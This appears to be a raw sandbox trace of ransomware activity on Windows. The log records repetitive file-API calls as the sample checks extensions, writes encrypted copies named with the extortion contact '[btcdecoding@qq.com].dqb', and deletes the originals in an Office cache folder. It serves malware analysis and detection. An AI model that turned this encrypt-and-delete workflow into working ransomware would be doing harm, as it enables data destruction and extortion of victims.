[0040.372] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2b3fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0040.372] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x13d6b54, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc2c | out: lpNewFilePointer=0x0) returned 1 [0040.372] ReadFile (in: hFile=0x1e4, lpBuffer=0x36d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b3fc38, lpOverlapped=0x0 | out: lpBuffer=0x36d0058*, lpNumberOfBytesRead=0x2b3fc38*=0x40000, lpOverlapped=0x0) returned 1 [0040.389] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.389] WriteFile (in: hFile=0x1e4, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x2b3fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0040.404] SetEndOfFile (hFile=0x1e4) returned 1 [0040.404] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3ef2068 [0040.408] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc7c | out: lpNewFilePointer=0x0) returned 1 [0040.408] WriteFile (in: hFile=0x1e4, lpBuffer=0x3ef2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b3fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef2068*, lpNumberOfBytesWritten=0x2b3fc88*=0x40000, lpOverlapped=0x0) returned 1 [0040.409] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x6b23c6, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc7c | out: lpNewFilePointer=0x0) returned 1 [0040.409] WriteFile (in: hFile=0x1e4, lpBuffer=0x3ef2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b3fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef2068*, lpNumberOfBytesWritten=0x2b3fc88*=0x40000, lpOverlapped=0x0) returned 1 [0040.410] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x13d6b54, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc7c | out: lpNewFilePointer=0x0) returned 1 [0040.410] WriteFile (in: hFile=0x1e4, lpBuffer=0x3ef2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b3fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef2068*, lpNumberOfBytesWritten=0x2b3fc88*=0x40000, lpOverlapped=0x0) returned 1 [0040.411] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3ef2068 | out: hHeap=0x570000) returned 1 [0040.411] CloseHandle (hObject=0x1e4) returned 1 [0043.067] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0043.067] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0043.067] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0043.067] lstrlenW (lpString=".doc") returned 4 [0043.067] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0043.067] lstrlenW (lpString=".docx") returned 5 [0043.067] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1 [0043.068] lstrlenW (lpString=".pdf") returned 4 [0043.068] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0043.068] lstrlenW (lpString=".xls") returned 4 [0043.068] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0043.068] lstrlenW (lpString=".xlsx") returned 5 [0043.068] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1 [0043.068] lstrlenW (lpString=".ppt") returned 4 [0043.068] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0043.068] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0043.068] lstrlenW (lpString=".zip") returned 4 [0043.068] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0043.068] lstrlenW (lpString=".rar") returned 4 [0043.068] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0043.068] lstrlenW (lpString=".bz2") returned 4 [0043.068] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0043.068] lstrlenW (lpString=".7z") returned 3 [0043.068] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0043.068] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0043.068] lstrlenW (lpString=".dbf") returned 4 [0043.068] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0043.068] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0043.068] lstrlenW (lpString=".1cd") returned 4 [0043.068] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0043.068] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0043.068] lstrlenW (lpString=".jpg") returned 4 [0043.068] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0043.068] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0043.068] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0043.068] lstrlenW (lpString=".doc") returned 4 [0043.068] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0043.068] lstrlenW (lpString=".docx") returned 5 [0043.068] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1 [0043.068] lstrlenW (lpString=".pdf") returned 4 [0043.068] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0043.069] lstrlenW (lpString=".xls") returned 4 [0043.069] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0043.069] lstrlenW (lpString=".xlsx") returned 5 [0043.069] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1 [0043.069] lstrlenW (lpString=".ppt") returned 4 [0043.069] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0043.069] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0043.069] lstrlenW (lpString=".zip") returned 4 [0043.069] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0043.069] lstrlenW (lpString=".rar") returned 4 [0043.069] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0043.069] lstrlenW (lpString=".bz2") returned 4 [0043.069] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0043.069] lstrlenW (lpString=".7z") returned 3 [0043.069] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0043.069] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0043.069] lstrlenW (lpString=".dbf") returned 4 [0043.069] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0043.069] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0043.069] lstrlenW (lpString=".1cd") returned 4 [0043.069] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0043.069] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0043.069] lstrlenW (lpString=".jpg") returned 4 [0043.069] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0043.069] lstrcmpiW (lpString1=".dll", lpString2=".dqb") returned -1 [0043.069] lstrlenW (lpString="dwintl20.dll") returned 12 [0043.069] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0043.070] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=107912) returned 1 [0043.070] CloseHandle (hObject=0x1e4) returned 1 [0043.070] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll")) returned 0x2020 [0043.070] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.070] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0043.070] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.070] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.070] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0043.538] GetLastError () returned 0x0 [0043.538] ReadFile (in: hFile=0x1e4, lpBuffer=0x3650020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesRead=0x2b3fed4*=0x1a588, lpOverlapped=0x0) returned 1 [0043.565] WriteFile (in: hFile=0x178, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0x1a590, lpNumberOfBytesWritten=0x2b3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fc9c*=0x1a590, lpOverlapped=0x0) returned 1 [0043.567] ReadFile (in: hFile=0x1e4, lpBuffer=0x3650020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesRead=0x2b3fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.567] WriteFile (in: hFile=0x178, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0043.567] SetEndOfFile (hFile=0x178) returned 1 [0043.568] CloseHandle (hObject=0x178) returned 1 [0043.568] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.568] SetEndOfFile (hFile=0x1e4) returned 1 [0043.569] CloseHandle (hObject=0x1e4) returned 1 [0043.569] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0043.569] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll")) returned 1 [0043.569] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0043.569] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0043.570] lstrlenW (lpString=".doc") returned 4 [0043.570] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0043.570] lstrlenW (lpString=".docx") returned 5 [0043.570] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0043.570] lstrlenW (lpString=".pdf") returned 4 [0043.570] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0043.570] lstrlenW (lpString=".xls") returned 4 [0043.570] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0043.570] lstrlenW (lpString=".xlsx") returned 5 [0043.570] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0043.570] lstrlenW (lpString=".ppt") returned 4 [0043.570] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0043.570] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0043.570] lstrlenW (lpString=".zip") returned 4 [0043.570] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0043.570] lstrlenW (lpString=".rar") returned 4 [0043.570] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0043.570] lstrlenW (lpString=".bz2") returned 4 [0043.570] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0043.570] lstrlenW (lpString=".7z") returned 3 [0043.570] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0043.570] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0043.570] lstrlenW (lpString=".dbf") returned 4 [0043.570] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0043.570] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0043.570] lstrlenW (lpString=".1cd") returned 4 [0043.570] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0043.570] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0043.570] lstrlenW (lpString=".jpg") returned 4 [0043.570] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0043.570] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0043.570] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0043.570] lstrlenW (lpString=".doc") returned 4 [0043.570] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0043.570] lstrlenW (lpString=".docx") returned 5 [0043.571] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0043.571] lstrlenW (lpString=".pdf") returned 4 [0043.571] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0043.571] lstrlenW (lpString=".xls") returned 4 [0043.571] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0043.571] lstrlenW (lpString=".xlsx") returned 5 [0043.571] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0043.571] lstrlenW (lpString=".ppt") returned 4 [0043.571] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0043.571] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0043.571] lstrlenW (lpString=".zip") returned 4 [0043.571] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0043.571] lstrlenW (lpString=".rar") returned 4 [0043.571] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0043.571] lstrlenW (lpString=".bz2") returned 4 [0043.571] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0043.571] lstrlenW (lpString=".7z") returned 3 [0043.571] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0043.571] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0043.571] lstrlenW (lpString=".dbf") returned 4 [0043.571] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0043.571] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0043.571] lstrlenW (lpString=".1cd") returned 4 [0043.571] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0043.571] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0043.571] lstrlenW (lpString=".jpg") returned 4 [0043.571] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0043.571] lstrcmpiW (lpString1=".dll", lpString2=".dqb") returned -1 [0043.571] lstrlenW (lpString="dwdcw20.dll") returned 11 [0043.571] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0043.572] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=526176) returned 1 [0043.572] CloseHandle (hObject=0x1e4) returned 1 [0043.572] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll")) returned 0x2020 [0043.572] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.572] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0043.572] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.572] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.572] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0043.572] GetLastError () returned 0x0 [0043.572] ReadFile (in: hFile=0x1e4, lpBuffer=0x3650020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesRead=0x2b3fed4*=0x80760, lpOverlapped=0x0) returned 1 [0043.585] WriteFile (in: hFile=0x178, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0x80770, lpNumberOfBytesWritten=0x2b3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fc9c*=0x80770, lpOverlapped=0x0) returned 1 [0043.594] ReadFile (in: hFile=0x1e4, lpBuffer=0x3650020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesRead=0x2b3fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.594] WriteFile (in: hFile=0x178, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2b3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fc9c*=0xea, lpOverlapped=0x0) returned 1 [0043.594] SetEndOfFile (hFile=0x178) returned 1 [0043.594] CloseHandle (hObject=0x178) returned 1 [0043.594] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.595] SetEndOfFile (hFile=0x1e4) returned 1 [0043.599] CloseHandle (hObject=0x1e4) returned 1 [0043.599] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0043.599] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll")) returned 1 [0043.600] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0043.600] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0043.600] lstrlenW (lpString=".doc") returned 4 [0043.600] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0043.600] lstrlenW (lpString=".docx") returned 5 [0043.600] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0043.600] lstrlenW (lpString=".pdf") returned 4 [0043.600] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0043.600] lstrlenW (lpString=".xls") returned 4 [0043.600] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0043.600] lstrlenW (lpString=".xlsx") returned 5 [0043.600] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0043.600] lstrlenW (lpString=".ppt") returned 4 [0043.600] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0043.600] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0043.600] lstrlenW (lpString=".zip") returned 4 [0043.600] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0043.600] lstrlenW (lpString=".rar") returned 4 [0043.600] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0043.600] lstrlenW (lpString=".bz2") returned 4 [0043.600] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0043.600] lstrlenW (lpString=".7z") returned 3 [0043.600] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0043.600] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0043.600] lstrlenW (lpString=".dbf") returned 4 [0043.600] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0043.600] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0043.600] lstrlenW (lpString=".1cd") returned 4 [0043.600] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0043.600] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0043.600] lstrlenW (lpString=".jpg") returned 4 [0043.600] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0043.600] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0043.601] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0043.601] lstrlenW (lpString=".doc") returned 4 [0043.601] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0043.601] lstrlenW (lpString=".docx") returned 5 [0043.601] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0043.601] lstrlenW (lpString=".pdf") returned 4 [0043.601] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0043.601] lstrlenW (lpString=".xls") returned 4 [0043.601] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0043.601] lstrlenW (lpString=".xlsx") returned 5 [0043.601] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0043.601] lstrlenW (lpString=".ppt") returned 4 [0043.601] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0043.601] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0043.601] lstrlenW (lpString=".zip") returned 4 [0043.601] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0043.601] lstrlenW (lpString=".rar") returned 4 [0043.601] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0043.601] lstrlenW (lpString=".bz2") returned 4 [0043.601] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0043.601] lstrlenW (lpString=".7z") returned 3 [0043.601] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0043.601] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0043.601] lstrlenW (lpString=".dbf") returned 4 [0043.601] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0043.601] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0043.601] lstrlenW (lpString=".1cd") returned 4 [0043.601] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0043.601] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0043.601] lstrlenW (lpString=".jpg") returned 4 [0043.601] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0043.602] lstrcmpiW (lpString1=".exe", lpString2=".dqb") returned 1 [0043.602] lstrlenW (lpString="dwtrig20.exe") returned 12 [0043.602] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0043.602] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=519584) returned 1 [0043.602] 